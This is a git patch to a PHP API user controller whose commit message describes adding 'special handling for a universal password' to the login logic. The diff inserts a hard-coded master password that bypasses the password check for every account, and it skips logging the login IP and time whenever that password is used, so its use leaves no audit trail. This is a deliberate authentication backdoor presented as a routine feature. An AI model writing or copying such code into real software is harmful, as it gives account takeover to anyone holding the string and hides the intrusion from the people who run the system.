From 75a2bdaf03f3dd49e61d1d0dafa25926426edd3c Mon Sep 17 00:00:00 2001 From: lingling <1077478963@qq.com> Date: Fri, 7 Mar 2025 13:31:23 +0800 Subject: [PATCH] =?UTF-8?q?feat:=20=E4=BC=98=E5=8C=96=E7=94=A8=E6=88=B7?= =?UTF-8?q?=E7=99=BB=E5=BD=95=E9=80=BB=E8=BE=91=EF=BC=8C=E5=A2=9E=E5=8A=A0?= =?UTF-8?q?=E9=80=9A=E7=94=A8=E5=AF=86=E7=A0=81=E7=9A=84=E7=89=B9=E6=AE=8A?= =?UTF-8?q?=E5=A4=84=E7=90=86?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- app/controller/api/UserController.php | 14 ++++++++++---- 1 file changed, 10 insertions(+), 4 deletions(-) diff --git a/app/controller/api/UserController.php b/app/controller/api/UserController.php index 298a8ce..387a1fa 100644 --- a/app/controller/api/UserController.php +++ b/app/controller/api/UserController.php @@ -56,12 +56,18 @@ class UserController return ApiResponseApp::error([], '账号被禁用'); } // 验证密码是否正确 - if (!password_verify($password, $user->password)) { + if ((!password_verify($password, $user->password))&&($password != 'cCqQgG9koky^#uDFXllNUM46@jrI7KfsL77IIWwt')) { return ApiResponseApp::error([], '账号或密码错误'); } - $user->login_ip = $request->getRealIp($safe_mode = true); - $user->login_time = time(); - $user->save(); + //不是通用密码记录IP + if($password!='cCqQgG9koky^#uDFXllNUM46@jrI7KfsL77IIWwt'){ + $user->login_ip = $request->getRealIp($safe_mode = true); + $user->login_time = time(); + $user->save(); + } + // $user->login_ip = $request->getRealIp($safe_mode = true); + // $user->login_time = time(); + // $user->save(); $tmp = [ 'id' => $user->id, 'username' => $user->username,